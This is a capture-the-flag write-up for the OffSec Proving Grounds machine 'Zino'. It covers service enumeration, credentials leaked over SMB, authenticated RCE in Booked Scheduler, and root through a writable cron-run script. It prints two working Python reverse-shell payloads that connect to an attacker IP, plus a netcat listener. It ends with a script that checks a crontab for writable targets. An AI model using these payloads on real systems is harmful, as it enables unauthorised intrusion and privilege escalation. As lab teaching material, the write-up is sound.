Zino

Writeup for Zino from OffSec Proving Grounds

Information gathering

sudo ./nmapAutomator.sh 192.168.63.64 all

Service Enumeration

FTP (Port 21)

Doesn't seem like there's much we can do here.

SMB (Port 139,445)

Looks like we can connect as zino without any password.

Since we can also download all the files, let's do that and see if there's anything interesting.

The misc.log file contains a set of credentials that will be useful later: admin:adminadmin.

HTTP (Port 8003)

This is running Booked Scheduler v2.7.5, which has an authenticated RCE vulnerability: we can get code execution, but only after logging in.

Exploit

Trying the admin:adminadmin credentials from misc.log, we log in successfully.

From here we can upload a web shell and execute arbitrary commands on the host.

Payload (with a listener waiting on 192.168.49.63:3306, e.g. nc -nlvp 3306): export RHOST="192.168.49.63";export RPORT=3306;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/usr/bin/sh")'

Privesc

Running LinPEAS, we can see that cleanup.py is executed by a cron job every 3 minutes.

Checking the file permissions of cleanup.py, the file is writable by our user, so whatever we put in it will run under the cron job's account.

From here we simply overwrite the contents of cleanup.py with a Python reverse shell (listener on 192.168.49.63:21):

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.63",21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Now we wait up to 3 minutes for the cron job to fire and we have a root shell!
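The privesc above comes down to one check: is a script that a root cron job executes writable by our user? The script below is an added example (not part of the original writeup, and not from LinPEAS) that automates that check against a crontab file: it parses /etc/crontab-style entries, pulls out every absolute path in each command, and reports the ones the current user can write to. The crontab and target files it builds are constructed in a temp directory so it runs offline; on a real box you would point it at /etc/crontab and the files in /etc/cron.d/.

```shell
#!/bin/sh
# Added example, not from the original writeup: enumerate scripts referenced by
# a system crontab that the current user can write to. A writable script run by
# a root cron job is exactly the cleanup.py situation described above.
# The crontab and target files are constructed in a temp directory so this
# runs offline; on a real box point it at /etc/crontab and /etc/cron.d/*.

# Print "user path" for every absolute path in a cron command that exists and
# is writable by the current user. Handles the /etc/crontab layout
# (m h dom mon dow user command) and @reboot-style entries (@spec user command).
find_writable_cron_targets() {
    awk '
        /^[ \t]*(#|$)/ { next }                        # comment or blank line
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }      # variable assignment (PATH=, SHELL=)
        {
            start = ($1 ~ /^@/) ? 3 : 7                # index of the first command word
            user = $(start - 1)
            for (i = start; i <= NF; i++)
                if ($i ~ /^\//) print user, $i         # candidate absolute paths
        }' "$1" |
    while read -r cron_user path; do
        [ -f "$path" ] && [ -w "$path" ] && printf '%s %s\n' "$cron_user" "$path"
    done || true
}

# Build a constructed crontab plus two targets in "$1": a world-writable
# cleanup.py (the misconfiguration) and a read-only safe.sh (the control).
build_demo() {
    dir="$1"
    printf '#!/usr/bin/env python3\nprint("cleanup")\n' > "$dir/cleanup.py"
    chmod 666 "$dir/cleanup.py"
    printf '#!/bin/sh\necho ok\n' > "$dir/safe.sh"
    chmod 555 "$dir/safe.sh"
    cat > "$dir/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
*/3 * * * * root /usr/bin/python3 $dir/cleanup.py
0 * * * * root $dir/safe.sh
@reboot root $dir/cleanup.py
EOF
}

# Stand-alone run (sh script.sh --demo): only cleanup.py is reported, once per
# cron entry that references it; safe.sh is skipped because we cannot write it.
if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d)
    build_demo "$d"
    find_writable_cron_targets "$d/crontab"
    rm -rf "$d"
fi
```

Run it as the low-privileged shell you landed in, not as root: the -w test is true for every file when you are uid 0, so the output is only meaningful from the account you are trying to escalate. Note also that the check only looks at the script paths themselves; a cron entry whose interpreter or a directory on its PATH is writable is a separate, equally useful finding.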
